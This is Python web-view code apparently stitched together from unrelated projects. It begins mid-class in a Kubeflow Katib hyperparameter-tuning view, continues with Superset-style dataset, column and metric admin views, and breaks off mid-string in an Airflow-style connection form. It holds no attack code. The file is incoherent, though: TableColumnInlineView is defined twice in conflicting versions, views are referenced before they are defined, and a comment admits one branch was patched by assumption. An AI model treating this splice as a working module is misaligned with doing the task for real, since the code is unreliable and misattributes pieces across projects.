        _(datamodel.obj.lab('image_pull_policy')),
        description="image pull policy (Always: always pull the remote image; IfNotPresent: use the local image when it exists)",
        widget=Select2Widget(),
        choices=[['Always', 'Always'], ['IfNotPresent', 'IfNotPresent']]
    )
    edit_form_extra_fields['volume_mount'] = StringField(
        _(datamodel.obj.lab('volume_mount')),
        description='external mounts, format: $pvc_name1(pvc):/$container_path1,$pvc_name2(pvc):/$container_path2',
        widget=BS3TextFieldWidget()
    )
    edit_form_extra_fields['resource_memory'] = StringField(
        _(datamodel.obj.lab('resource_memory')),
        default=datamodel.obj.resource_memory.default.arg,
        description='memory limit (per trial), e.g. 1G, 20G',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )
    edit_form_extra_fields['resource_cpu'] = StringField(
        _(datamodel.obj.lab('resource_cpu')),
        default=datamodel.obj.resource_cpu.default.arg,
        description='CPU limit (per trial, unit: cores), e.g. 2',
        widget=BS3TextFieldWidget(),
        validators=[DataRequired()]
    )

    # @pysnooper.snoop()
    def set_column(self, hp=None):
        # prepare the edit form based on the job type
        request_data = request.args.to_dict()
        job_type = request_data.get('job_type', '')
        if hp:
            job_type = hp.job_type
        job_type_choices = ['', 'TFJob', 'XGBoostJob', 'PyTorchJob', 'Job']
        job_type_choices = [[choice, choice] for choice in job_type_choices]
        if hp:
            self.edit_form_extra_fields['job_type'] = SelectField(
                _(self.datamodel.obj.lab('job_type')),
                description="job type of the hyperparameter search",
                choices=job_type_choices,
                widget=MySelect2Widget(extra_classes="readonly", value=job_type),
                validators=[DataRequired()]
            )
        else:
            self.edit_form_extra_fields['job_type'] = SelectField(
                _(self.datamodel.obj.lab('job_type')),
                description="job type of the hyperparameter search",
                widget=MySelect2Widget(new_web=True, value=job_type),
                choices=job_type_choices,
                validators=[DataRequired()]
            )
        self.edit_form_extra_fields['tf_worker_num'] = IntegerField(
            _(self.datamodel.obj.lab('tf_worker_num')),
            default=json.loads(hp.job_json).get('tf_worker_num', 3) if hp and hp.job_json else 3,
            description='number of worker nodes',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['tf_worker_image'] = StringField(
            _(self.datamodel.obj.lab('tf_worker_image')),
            default=json.loads(hp.job_json).get('tf_worker_image', conf.get('KATIB_TFJOB_DEFAULT_IMAGE', '')) if hp and hp.job_json else conf.get('KATIB_TFJOB_DEFAULT_IMAGE', ''),
            description='worker image',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['tf_worker_command'] = StringField(
            _(self.datamodel.obj.lab('tf_worker_command')),
            default=json.loads(hp.job_json).get('tf_worker_command', 'python xx.py') if hp and hp.job_json else 'python xx.py',
            description='worker start command',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['job_worker_image'] = StringField(
            _(self.datamodel.obj.lab('job_worker_image')),
            default=json.loads(hp.job_json).get('job_worker_image', conf.get('KATIB_JOB_DEFAULT_IMAGE', '')) if hp and hp.job_json else conf.get('KATIB_JOB_DEFAULT_IMAGE', ''),
            description='worker image',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['job_worker_command'] = StringField(
            _(self.datamodel.obj.lab('job_worker_command')),
            default=json.loads(hp.job_json).get('job_worker_command', 'python xx.py') if hp and hp.job_json else 'python xx.py',
            description='worker start command',
            widget=MyBS3TextAreaFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['pytorch_worker_num'] = IntegerField(
            _(self.datamodel.obj.lab('pytorch_worker_num')),
            default=json.loads(hp.job_json).get('pytorch_worker_num', 3) if hp and hp.job_json else 3,
            description='number of worker nodes',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['pytorch_worker_image'] = StringField(
            _(self.datamodel.obj.lab('pytorch_worker_image')),
            default=json.loads(hp.job_json).get('pytorch_worker_image', conf.get('KATIB_PYTORCHJOB_DEFAULT_IMAGE', '')) if hp and hp.job_json else conf.get('KATIB_PYTORCHJOB_DEFAULT_IMAGE', ''),
            description='worker image',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['pytorch_master_command'] = StringField(
            _(self.datamodel.obj.lab('pytorch_master_command')),
            default=json.loads(hp.job_json).get('pytorch_master_command', 'python xx.py') if hp and hp.job_json else 'python xx.py',
            description='master start command',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_form_extra_fields['pytorch_worker_command'] = StringField(
            _(self.datamodel.obj.lab('pytorch_worker_command')),
            default=json.loads(hp.job_json).get('pytorch_worker_command', 'python xx.py') if hp and hp.job_json else 'python xx.py',
            description='worker start command',
            widget=BS3TextFieldWidget(),
            validators=[DataRequired()]
        )
        self.edit_columns = ['job_type', 'project', 'name', 'namespace', 'describe',
                             'parallel_trial_count', 'max_trial_count', 'max_failed_trial_count',
                             'objective_type', 'objective_goal', 'objective_metric_name',
                             'objective_additional_metric_names', 'algorithm_name',
                             'algorithm_setting', 'parameters_demo', 'parameters']
        self.edit_fieldsets = [(
            lazy_gettext('common'),
            {"fields": copy.deepcopy(self.edit_columns), "expanded": True},
        )]
        if job_type == 'TFJob':
            group_columns = ['tf_worker_num', 'tf_worker_image', 'tf_worker_command']
            self.edit_fieldsets.append((
                lazy_gettext(job_type),
                {"fields": group_columns, "expanded": True},
            ))
            for column in group_columns:
                self.edit_columns.append(column)
        if job_type == 'Job':
            group_columns = ['job_worker_image', 'job_worker_command']
            self.edit_fieldsets.append((
                lazy_gettext(job_type),
                {"fields": group_columns, "expanded": True},
            ))
            for column in group_columns:
                self.edit_columns.append(column)
        if job_type == 'PyTorchJob':
            group_columns = ['pytorch_worker_num', 'pytorch_worker_image', 'pytorch_master_command', 'pytorch_worker_command']
            self.edit_fieldsets.append((
                lazy_gettext(job_type),
                {"fields": group_columns, "expanded": True},
            ))
            for column in group_columns:
                self.edit_columns.append(column)
        if job_type == 'XGBoostJob':
            # assumption: no XGBoost-specific form fields are defined above (the original
            # listed undefined 'pytorchjob_*' names), so the generic Job fields are grouped here
            group_columns = ['job_worker_image', 'job_worker_command']
            self.edit_fieldsets.append((
                lazy_gettext(job_type),
                {"fields": group_columns, "expanded": True},
            ))
            for column in group_columns:
                self.edit_columns.append(column)
        task_column = ['working_dir', 'volume_mount', 'node_selector', 'image_pull_policy', 'resource_memory', 'resource_cpu']
        self.edit_fieldsets.append((
            lazy_gettext('task args'),
            {"fields": task_column, "expanded": True},
        ))
        for column in task_column:
            self.edit_columns.append(column)
        self.edit_fieldsets.append((
            lazy_gettext('run experiment'),
            {"fields": ['alert_status'], "expanded": True},
        ))
        self.edit_columns.append('alert_status')
        self.add_form_extra_fields = self.edit_form_extra_fields
        self.add_fieldsets = self.edit_fieldsets
        self.add_columns = self.edit_columns

    # handle the submitted form
    def process_form(self, form, is_created):
        # from flask_appbuilder.forms import DynamicForm
        if 'parameters_demo' in form._fields:
            del form._fields['parameters_demo']  # demo-only field, not persisted

    # build the experiment
    # @pysnooper.snoop()
    def make_experiment(self, item):
        # search algorithm
        algorithmsettings = []
        for setting in item.algorithm_setting.strip().split(','):
            setting = setting.strip()
            if setting:
                key, value = setting.split('=')[0].strip(), setting.split('=')[1].strip()
                algorithmsettings.append(V1alpha3AlgorithmSetting(name=key, value=value))
        algorithm = V1alpha3AlgorithmSpec(
            algorithm_name=item.algorithm_name,
            algorithm_settings=algorithmsettings if algorithmsettings else None
        )
        # metrics collection; there are many collection methods, so this should not be hard-coded here
        metrics_collector_spec = None
        if item.job_type == 'TFJob':
            collector = V1alpha3CollectorSpec(kind="TensorFlowEvent")
            source = V1alpha3SourceSpec(V1alpha3FileSystemPath(kind="Directory", path="/train"))
            metrics_collector_spec = V1alpha3MetricsCollectorSpec(
                collector=collector,
                source=source)
        elif item.job_type == 'Job':
            pass
        # objective
        objective = V1alpha3ObjectiveSpec(
            goal=item.objective_goal,
            objective_metric_name=item.objective_metric_name,
            type=item.objective_type)
        # search parameters
        parameters = []
        hp_parameters = json.loads(item.parameters)
        for parameter in hp_parameters:
            if hp_parameters[parameter]['type'] == 'int' or hp_parameters[parameter]['type'] == 'double':
                feasible_space = V1alpha3FeasibleSpace(
                    min=str(hp_parameters[parameter]['min']),
                    max=str(hp_parameters[parameter]['max']),
                    step=str(hp_parameters[parameter].get('step', '')) if hp_parameters[parameter].get('step', '') else None)
                parameters.append(V1alpha3ParameterSpec(
                    feasible_space=feasible_space,
                    name=parameter,
                    parameter_type=hp_parameters[parameter]['type']
                ))
            elif hp_parameters[parameter]['type'] == 'categorical':
                feasible_space = V1alpha3FeasibleSpace(list=hp_parameters[parameter]['list'])
                parameters.append(V1alpha3ParameterSpec(
                    feasible_space=feasible_space,
                    name=parameter,
                    parameter_type=hp_parameters[parameter]['type']
                ))
        # trial template
        go_template = V1alpha3GoTemplate(
            raw_template=item.trial_spec
        )
        trial_template = V1alpha3TrialTemplate(go_template=go_template)
        labels = {
            "run-rtx": g.user.username,
            "hp-name": item.name,
            # "hp-describe": item.describe
        }
        # Experiment: the object that actually runs the trials
        experiment = V1alpha3Experiment(
            api_version=conf.get('CRD_INFO')['experiment']['group'] + "/" + conf.get('CRD_INFO')['experiment']['version'],  # "kubeflow.org/v1alpha3"
            kind="Experiment",
            metadata=V1ObjectMeta(name=item.name + "-" + uuid.uuid4().hex[:4], namespace=conf.get('KATIB_NAMESPACE'), labels=labels),
            spec=V1alpha3ExperimentSpec(
                algorithm=algorithm,
                max_failed_trial_count=item.max_failed_trial_count,
                max_trial_count=item.max_trial_count,
                metrics_collector_spec=metrics_collector_spec,
                objective=objective,
                parallel_trial_count=item.parallel_trial_count,
                parameters=parameters,
                trial_template=trial_template
            )
        )
        item.experiment = json.dumps(experiment.to_dict(), indent=4, ensure_ascii=False)

    @expose('/create_experiment/<id>', methods=['GET'])
    # @pysnooper.snoop(watch_explode=('hp',))
    def create_experiment(self, id):
        hp = db.session.query(Hyperparameter_Tuning).filter(Hyperparameter_Tuning.id == int(id)).first()
        if hp:
            from myapp.utils.py.py_k8s import K8s
            k8s_client = K8s(hp.project.cluster.get('KUBECONFIG', ''))
            namespace = conf.get('KATIB_NAMESPACE')
            crd_info = conf.get('CRD_INFO')['experiment']
            print(hp.experiment)
            k8s_client.create_crd(group=crd_info['group'], version=crd_info['version'], plural=crd_info['plural'], namespace=namespace, body=hp.experiment)
            flash('deployment finished', 'success')
            # kclient = kc.KatibClient()
            # kclient.create_experiment(hp, namespace=conf.get('KATIB_NAMESPACE'))
        self.update_redirect()
        return redirect(self.get_redirect())

    # @pysnooper.snoop(watch_explode=())
    def merge_trial_spec(self, item):
        image_secrets = conf.get('HUBSECRET', [])
        user_hubsecrets = db.session.query(Repository.hubsecret).filter(Repository.created_by_fk == g.user.id).all()
        if user_hubsecrets:
            for hubsecret in user_hubsecrets:
                if hubsecret[0] not in image_secrets:
                    image_secrets.append(hubsecret[0])
        image_secrets = [
            {
                "name": hubsecret
            } for hubsecret in image_secrets
        ]
        item.job_json = {}
        if item.job_type == 'TFJob':
            item.trial_spec = core.merge_tfjob_experiment_template(
                worker_num=item.tf_worker_num,
                node_selector=item.get_node_selector(),
                volume_mount=item.volume_mount,
                image=item.tf_worker_image,
                image_secrets=image_secrets,
                hostAliases=conf.get('HOSTALIASES', ''),
                workingDir=item.working_dir,
                image_pull_policy=conf.get('IMAGE_PULL_POLICY', 'Always'),
                resource_memory=item.resource_memory,
                resource_cpu=item.resource_cpu,
                command=item.tf_worker_command
            )
            item.job_json = {
                "tf_worker_num": item.tf_worker_num,
                "tf_worker_image": item.tf_worker_image,
                "tf_worker_command": item.tf_worker_command,
            }
        if item.job_type == 'Job':
            item.trial_spec = core.merge_job_experiment_template(
                node_selector=item.get_node_selector(),
                volume_mount=item.volume_mount,
                image=item.job_worker_image,
                image_secrets=image_secrets,
                hostAliases=conf.get('HOSTALIASES', ''),
                workingDir=item.working_dir,
                image_pull_policy=conf.get('IMAGE_PULL_POLICY', 'Always'),
                resource_memory=item.resource_memory,
                resource_cpu=item.resource_cpu,
                command=item.job_worker_command
            )
            item.job_json = {
                "job_worker_image": item.job_worker_image,
                "job_worker_command": item.job_worker_command,
            }
        if item.job_type == 'PyTorchJob':
            item.trial_spec = core.merge_pytorchjob_experiment_template(
                worker_num=item.pytorch_worker_num,
                node_selector=item.get_node_selector(),
                volume_mount=item.volume_mount,
                image=item.pytorch_worker_image,
                image_secrets=image_secrets,
                hostAliases=conf.get('HOSTALIASES', ''),
                workingDir=item.working_dir,
                image_pull_policy=conf.get('IMAGE_PULL_POLICY', 'Always'),
                resource_memory=item.resource_memory,
                resource_cpu=item.resource_cpu,
                master_command=item.pytorch_master_command,
                worker_command=item.pytorch_worker_command
            )
            item.job_json = {
                "pytorch_worker_num": item.pytorch_worker_num,
                "pytorch_worker_image": item.pytorch_worker_image,
                "pytorch_master_command": item.pytorch_master_command,
                "pytorch_worker_command": item.pytorch_worker_command,
            }
        item.job_json = json.dumps(item.job_json, indent=4, ensure_ascii=False)

    # check whether the parameters are valid
    # @pysnooper.snoop()
    def validate_parameters(self, parameters, algorithm):
        try:
            parameters = json.loads(parameters)
            for parameter_name in parameters:
                parameter = parameters[parameter_name]
                if parameter['type'] == 'int' and 'min' in parameter and 'max' in parameter:
                    parameter['min'] = int(parameter['min'])
                    parameter['max'] = int(parameter['max'])
                    if not parameter['max'] > parameter['min']:
                        raise Exception('min must be lower than max')
                    continue
                if parameter['type'] == 'double' and 'min' in parameter and 'max' in parameter:
                    parameter['min'] = float(parameter['min'])
                    parameter['max'] = float(parameter['max'])
                    if not parameter['max'] > parameter['min']:
                        raise Exception('min must be lower than max')
                    if algorithm == 'grid':
                        parameter['step'] = float(parameter['step'])
                    continue
                if parameter['type'] == 'categorical' and 'list' in parameter and isinstance(parameter['list'], list):
                    continue
                raise MyappException('parameter type must be one of [int, double, categorical]; '
                                     'min/max/step/list must be present as required, and min must be lower than max')
            return json.dumps(parameters, indent=4, ensure_ascii=False)
        except Exception as e:
            print(e)
            raise MyappException('parameters not valid: ' + str(e))

    # @pysnooper.snoop()
    def pre_add(self, item):
        if item.job_type is None:
            raise MyappException("Job type is mandatory")
        core.validate_json(item.parameters)
        item.parameters = self.validate_parameters(item.parameters, item.algorithm_name)
        item.resource_memory = core.check_resource_memory(item.resource_memory, self.src_item_json.get('resource_memory', None) if self.src_item_json else None)
        item.resource_cpu = core.check_resource_cpu(item.resource_cpu, self.src_item_json.get('resource_cpu', None) if self.src_item_json else None)
        self.merge_trial_spec(item)
        self.make_experiment(item)

    def pre_update(self, item):
        self.pre_add(item)

    pre_add_get = set_column
    pre_update_get = set_column

    @action(
        "copy", __("Copy Hyperparameter Experiment"),
        confirmation=__('Copy Hyperparameter Experiment'),
        icon="fa-copy", multiple=True, single=False
    )
    def copy(self, hps):
        if not isinstance(hps, list):
            hps = [hps]
        for hp in hps:
            new_hp = hp.clone()
            new_hp.name = new_hp.name + "-copy"
            new_hp.describe = new_hp.describe + "-copy"
            new_hp.created_on = datetime.datetime.now()
            new_hp.changed_on = datetime.datetime.now()
            db.session.add(new_hp)
            db.session.commit()
        return redirect(request.referrer)
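# A minimal sketch of a search-parameter document that validate_parameters() above
# accepts; the parameter names ("lr", "batch_size", "optimizer") are invented for
# illustration. All ints/floats are written as strings, as the form description asks.
demo_parameters = json.dumps({
    "lr": {"type": "double", "min": "0.0001", "max": "0.1", "step": "0.001"},  # "step" is required for the 'grid' algorithm
    "batch_size": {"type": "int", "min": "16", "max": "256"},
    "optimizer": {"type": "categorical", "list": ["adam", "sgd"]},
})
# validate_parameters(demo_parameters, 'grid') round-trips this JSON with min/max cast;
# any type outside [int, double, categorical] raises MyappException.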
class TableModelView(  # pylint: disable=too-many-ancestors
    DatasourceModelView, DeleteMixin, YamlExportMixin
):
    datamodel = SQLAInterface(models.SqlaTable)
    class_permission_name = "Dataset"
    method_permission_name = MODEL_VIEW_RW_METHOD_PERMISSION_MAP
    include_route_methods = RouteMethod.CRUD_SET

    list_title = _("Tables")
    show_title = _("Show Table")
    add_title = _("Import a table definition")
    edit_title = _("Edit Table")

    list_columns = ["link", "database_name", "changed_by_", "modified"]
    order_columns = ["modified"]
    add_columns = ["database", "schema", "table_name"]
    edit_columns = [
        "table_name", "sql", "filter_select_enabled", "fetch_values_predicate",
        "database", "schema", "description", "owners", "main_dttm_col",
        "default_endpoint", "offset", "cache_timeout", "is_sqllab_view",
        "template_params", "extra",
    ]
    base_filters = [["id", DatasourceFilter, lambda: []]]
    show_columns = edit_columns + ["perm", "slices"]
    related_views = [
        TableColumnInlineView,
        SqlMetricInlineView,
    ]
    base_order = ("changed_on", "desc")
    search_columns = ("database", "schema", "table_name", "owners", "is_sqllab_view")
    description_columns = {
        "slices": _(
            "The list of charts associated with this table. By "
            "altering this datasource, you may change how these associated "
            "charts behave. "
            "Also note that charts need to point to a datasource, so "
            "this form will fail at saving if removing charts from a "
            "datasource. If you want to change the datasource for a chart, "
            "overwrite the chart from the 'explore view'"),
        "offset": _("Timezone offset (in hours) for this datasource"),
        "table_name": _("Name of the table that exists in the source database"),
        "schema": _(
            "Schema, as used only in some databases like Postgres, Redshift "
            "and DB2"),
        "description": Markup(
            'Supports <a href="https://daringfireball.net/projects/markdown/">'
            "markdown</a>"),
        "sql": _(
            "This field acts as a Superset view, meaning that Superset will "
            "run a query against this string as a subquery."),
        "fetch_values_predicate": _(
            "Predicate applied when fetching distinct values to "
            "populate the filter control component. Supports "
            "jinja template syntax. Applies only when "
            "`Enable Filter Select` is on."),
        "default_endpoint": _(
            "Redirects to this endpoint when clicking on the table "
            "from the table list"),
        "filter_select_enabled": _(
            "Whether to populate the filter's dropdown in the explore "
            "view's filter section with a list of distinct values fetched "
            "from the backend on the fly"),
        "is_sqllab_view": _(
            "Whether the table was generated by the 'Visualize' flow "
            "in SQL Lab"),
        "template_params": _(
            "A set of parameters that become available in the query using "
            "Jinja templating syntax"),
        "cache_timeout": _(
            "Duration (in seconds) of the caching timeout for this table. "
            "A timeout of 0 indicates that the cache never expires. "
            "Note this defaults to the database timeout if undefined."),
        "extra": utils.markdown(
            "Extra data to specify table metadata. Currently supports "
            'metadata of the format: `{ "certification": { "certified_by": '
            '"Data Platform Team", "details": "This table is the source of truth." '
            '}, "warning_markdown": "This is a warning." }`.',
            True,
        ),
    }
    label_columns = {
        "slices": _("Associated Charts"),
        "link": _("Table"),
        "changed_by_": _("Changed By"),
        "database": _("Database"),
        "database_name": _("Database"),
        "changed_on_": _("Last Changed"),
        "filter_select_enabled": _("Enable Filter Select"),
        "schema": _("Schema"),
        "default_endpoint": _("Default Endpoint"),
        "offset": _("Offset"),
        "cache_timeout": _("Cache Timeout"),
        "table_name": _("Table Name"),
        "fetch_values_predicate": _("Fetch Values Predicate"),
        "owners": _("Owners"),
        "main_dttm_col": _("Main Datetime Column"),
        "description": _("Description"),
        "is_sqllab_view": _("SQL Lab View"),
        "template_params": _("Template parameters"),
        "extra": _("Extra"),
        "modified": _("Modified"),
    }
    edit_form_extra_fields = {
        "database": QuerySelectField(
            "Database",
            query_factory=lambda: db.session.query(models.Database),
            widget=Select2Widget(extra_classes="readonly"),
        )
    }

    def post_add(  # pylint: disable=arguments-differ
        self,
        item: "TableModelView",
        flash_message: bool = True,
        fetch_metadata: bool = True,
    ) -> None:
        if fetch_metadata:
            item.fetch_metadata()
        create_table_permissions(item)
        if flash_message:
            flash(
                _(
                    "The table was created. "
                    "As part of this two-phase configuration "
                    "process, you should now click the edit button by "
                    "the new table to configure it."
                ),
                "info",
            )

    def post_update(self, item: "TableModelView") -> None:
        self.post_add(item, flash_message=False, fetch_metadata=False)

    def _delete(self, pk: int) -> None:
        DeleteMixin._delete(self, pk)

    @expose("/edit/<pk>", methods=["GET", "POST"])
    @has_access
    def edit(self, pk: str) -> FlaskResponse:
        """Simple hack to redirect to explore view after saving"""
        resp = super().edit(pk)
        if isinstance(resp, str):
            return resp
        return redirect("/superset/explore/table/{}/".format(pk))

    @expose("/list/")
    @has_access
    def list(self) -> FlaskResponse:
        return super().render_app_template()
class TableColumnInlineView(CompactCRUDMixin, SupersetModelView):  # noqa
    datamodel = SQLAInterface(models.TableColumn)

    list_title = _("Columns")
    show_title = _("Show Column")
    add_title = _("Add Column")
    edit_title = _("Edit Column")

    can_delete = False
    list_widget = ListWidgetWithCheckboxes
    edit_columns = [
        "column_name", "verbose_name", "description", "type", "groupby",
        "filterable", "table", "expression", "is_dttm", "python_date_format",
        "database_expression",
    ]
    add_columns = edit_columns
    list_columns = [
        "column_name", "verbose_name", "type", "groupby", "filterable", "is_dttm",
    ]
    page_size = 500
    description_columns = {
        "is_dttm": _(
            "Whether to make this column available as a "
            "[Time Granularity] option, column has to be DATETIME or "
            "DATETIME-like"),
        "filterable": _(
            "Whether this column is exposed in the `Filters` section "
            "of the explore view."),
        "type": _(
            "The data type that was inferred by the database. "
            "It may be necessary to input a type manually for "
            "expression-defined columns in some cases. In most cases "
            "users should not need to alter this."),
        "expression": utils.markdown(
            "a valid, *non-aggregating* SQL expression as supported by the "
            "underlying backend. Example: `substr(name, 1, 1)`",
            True,
        ),
        "python_date_format": utils.markdown(
            Markup(
                "The pattern of timestamp format, use "
                '<a href="https://docs.python.org/2/library/'
                'datetime.html#strftime-strptime-behavior">'
                "python datetime string pattern</a> "
                "expression. If time is stored in epoch "
                "format, put `epoch_s` or `epoch_ms`. Leave `Database Expression` "
                "below empty if timestamp is stored in "
                "String or Integer(epoch) type"),
            True,
        ),
        "database_expression": utils.markdown(
            "The database expression to cast internal datetime "
            "constants to database date/timestamp type according to the DBAPI. "
            "The expression should follow the pattern of "
            "%Y-%m-%d %H:%M:%S, based on different DBAPI. "
            "The string should be a python string formatter \n"
            "`Ex: TO_DATE('{}', 'YYYY-MM-DD HH24:MI:SS')` for Oracle. "
            "Superset uses the default expression based on the DB URI if this "
            "field is blank.",
            True,
        ),
    }
    label_columns = {
        "column_name": _("Column"),
        "verbose_name": _("Verbose Name"),
        "description": _("Description"),
        "groupby": _("Groupable"),
        "filterable": _("Filterable"),
        "table": _("Table"),
        "expression": _("Expression"),
        "is_dttm": _("Is temporal"),
        "python_date_format": _("Datetime Format"),
        "database_expression": _("Database Expression"),
        "type": _("Type"),
    }
    add_form_extra_fields = {
        "table": QuerySelectField(
            "Table",
            query_factory=lambda: db.session().query(models.SqlaTable),
            allow_blank=True,
            widget=Select2Widget(extra_classes="readonly"),
        )
    }
    edit_form_extra_fields = add_form_extra_fields
class TableColumnInlineView(CompactCRUDMixin, SupersetModelView):
    datamodel = SQLAInterface(models.TableColumn)
    # TODO TODO, review need for this on related_views
    class_permission_name = "Dataset"
    method_permission_name = MODEL_VIEW_RW_METHOD_PERMISSION_MAP
    include_route_methods = RouteMethod.RELATED_VIEW_SET | RouteMethod.API_SET

    list_title = _("Columns")
    show_title = _("Show Column")
    add_title = _("Add Column")
    edit_title = _("Edit Column")

    can_delete = False
    list_widget = ListWidgetWithCheckboxes
    edit_columns = [
        "column_name", "verbose_name", "description", "type", "groupby",
        "filterable", "table", "expression", "is_dttm", "python_date_format",
        "extra",
    ]
    add_columns = edit_columns
    list_columns = [
        "column_name", "verbose_name", "type", "groupby", "filterable", "is_dttm",
    ]
    page_size = 500
    description_columns = {
        "is_dttm": _(
            "Whether to make this column available as a "
            "[Time Granularity] option, column has to be DATETIME or "
            "DATETIME-like"),
        "filterable": _(
            "Whether this column is exposed in the `Filters` section "
            "of the explore view."),
        "type": _(
            "The data type that was inferred by the database. "
            "It may be necessary to input a type manually for "
            "expression-defined columns in some cases. In most cases "
            "users should not need to alter this."),
        "expression": utils.markdown(
            "a valid, *non-aggregating* SQL expression as supported by the "
            "underlying backend. Example: `substr(name, 1, 1)`",
            True,
        ),
        "python_date_format": utils.markdown(
            Markup(
                "The pattern of timestamp format. For strings use "
                '<a href="https://docs.python.org/2/library/'
                'datetime.html#strftime-strptime-behavior">'
                "python datetime string pattern</a> expression which needs to "
                'adhere to the <a href="https://en.wikipedia.org/wiki/ISO_8601">'
                "ISO 8601</a> standard to ensure that the lexicographical ordering "
                "coincides with the chronological ordering. If the timestamp "
                "format does not adhere to the ISO 8601 standard you will need to "
                "define an expression and type for transforming the string into a "
                "date or timestamp. Note currently time zones are not supported. "
                "If time is stored in epoch format, put `epoch_s` or `epoch_ms`. "
                "If no pattern is specified we fall back to using the optional "
                "defaults on a per database/column name level via the extra parameter."),
            True,
        ),
        "extra": utils.markdown(
            "Extra data to specify column metadata. Currently supports "
            'certification data of the format: `{ "certification": { "certified_by": '
            '"Taylor Swift", "details": "This column is the source of truth." '
            "} }`. This should be modified from the edit datasource model in "
            "Explore to ensure correct formatting.",
            True,
        ),
    }
    label_columns = {
        "column_name": _("Column"),
        "verbose_name": _("Verbose Name"),
        "description": _("Description"),
        "groupby": _("Groupable"),
        "filterable": _("Filterable"),
        "table": _("Table"),
        "expression": _("Expression"),
        "is_dttm": _("Is temporal"),
        "python_date_format": _("Datetime Format"),
        "type": _("Type"),
    }
    validators_columns = {
        "python_date_format": [
            # Restrict viable values to epoch_s, epoch_ms, or a strftime format
            # which adheres to the ISO 8601 format (without time zone).
            Regexp(
                re.compile(
                    r"""
                    ^(
                        epoch_s|epoch_ms|
                        (?P<date>%Y(-%m(-%d)?)?)([\sT](?P<time>%H(:%M(:%S(\.%f)?)?)?))?
                    )$
                    """,
                    re.VERBOSE,
                ),
                message=_("Invalid date/timestamp format"),
            )
        ]
    }
    add_form_extra_fields = {
        "table": QuerySelectField(
            "Table",
            query_factory=lambda: db.session.query(models.SqlaTable),
            allow_blank=True,
            widget=Select2Widget(extra_classes="readonly"),
        )
    }
    edit_form_extra_fields = add_form_extra_fields
class SqlMetricInlineView(CompactCRUDMixin, SupersetModelView):
    datamodel = SQLAInterface(models.SqlMetric)
    include_route_methods = RouteMethod.RELATED_VIEW_SET | RouteMethod.API_SET

    list_title = _("Metrics")
    show_title = _("Show Metric")
    add_title = _("Add Metric")
    edit_title = _("Edit Metric")

    list_columns = ["metric_name", "verbose_name", "metric_type"]
    edit_columns = [
        "metric_name", "description", "verbose_name", "metric_type",
        "expression", "table", "d3format", "warning_text",
    ]
    description_columns = {
        "expression": utils.markdown(
            "a valid, *aggregating* SQL expression as supported by the "
            "underlying backend. Example: `count(DISTINCT userid)`",
            True,
        ),
        "d3format": utils.markdown(
            "d3 formatting string as defined [here]"
            "(https://github.com/d3/d3-format/blob/master/README.md#format). "
            "For instance, this default formatting applies in the Table "
            "visualization and allows different metrics to use different "
            "formats",
            True,
        ),
    }
    add_columns = edit_columns
    page_size = 500
    label_columns = {
        "metric_name": _("Metric"),
        "description": _("Description"),
        "verbose_name": _("Verbose Name"),
        "metric_type": _("Type"),
        "expression": _("SQL Expression"),
        "table": _("Table"),
        "d3format": _("D3 Format"),
        "warning_text": _("Warning Message"),
    }
    add_form_extra_fields = {
        "table": QuerySelectField(
            "Table",
            query_factory=lambda: db.session().query(models.SqlaTable),
            allow_blank=True,
            widget=Select2Widget(extra_classes="readonly"),
        )
    }
    edit_form_extra_fields = add_form_extra_fields
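# Illustrative d3format values for the field above (syntax per the d3-format README
# linked in the description): ",d" renders 12345 as "12,345", ".2%" renders 0.123 as
# "12.30%", and "$,.2f" renders 1234.5 as "$1,234.50".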
class ConnectionForm(DynamicForm):
    """Form for editing and adding Connection"""
    conn_id = StringField(lazy_gettext('Conn Id'), widget=BS3TextFieldWidget())
    conn_type = SelectField(
        lazy_gettext('Conn Type'),
        choices=sorted(_connection_types, key=itemgetter(1)),  # pylint: disable=protected-access
        widget=Select2Widget())
    host = StringField(lazy_gettext('Host'), widget=BS3TextFieldWidget())
    schema = StringField(lazy_gettext('Schema'), widget=BS3TextFieldWidget())
    login = StringField(lazy_gettext('Login'), widget=BS3TextFieldWidget())
    password = PasswordField(lazy_gettext('Password'), widget=BS3PasswordFieldWidget())
    port = IntegerField(lazy_gettext('Port'), validators=[Optional()], widget=BS3TextFieldWidget())
    extra = TextAreaField(lazy_gettext('Extra'), widget=BS3TextAreaFieldWidget())

    # Used to customize the form: these form elements get rendered
    # and the results are stored in the extra field as JSON. All of them
    # need to be prefixed with extra__ and then the conn_type, as in
    # extra__{conn_type}__name. You can also hide form elements and rename
    # others from the connection_form.js file.
    extra__jdbc__drv_path = StringField(lazy_gettext('Driver Path'), widget=BS3TextFieldWidget())
    extra__jdbc__drv_clsname = StringField(lazy_gettext('Driver Class'), widget=BS3TextFieldWidget())
    extra__google_cloud_platform__project = StringField(
        lazy_gettext('Project Id'), widget=BS3TextFieldWidget())
    extra__google_cloud_platform__key_path = StringField(
        lazy_gettext('Keyfile Path'), widget=BS3TextFieldWidget())
    extra__google_cloud_platform__keyfile_dict = PasswordField(
        lazy_gettext('Keyfile JSON'), widget=BS3PasswordFieldWidget())
    extra__google_cloud_platform__scope = StringField(
        lazy_gettext('Scopes (comma separated)'), widget=BS3TextFieldWidget())
    extra__google_cloud_platform__num_retries = IntegerField(
        lazy_gettext('Number of Retries'),
        validators=[NumberRange(min=0)],
        widget=BS3TextFieldWidget(),
        default=5)
    extra__grpc__auth_type = StringField(lazy_gettext('Grpc Auth Type'), widget=BS3TextFieldWidget())
    extra__grpc__credential_pem_file = StringField(
        lazy_gettext('Credential Keyfile Path'), widget=BS3TextFieldWidget())
    extra__grpc__scopes = StringField(lazy_gettext('Scopes (comma separated)'), widget=BS3TextFieldWidget())
    extra__yandexcloud__service_account_json = PasswordField(
        lazy_gettext('Service account auth JSON'),
        widget=BS3PasswordFieldWidget(),
        description='Service account auth JSON. Looks like '
                    '{"id": "...", "service_account_id": "...", "private_key": "..."}. '
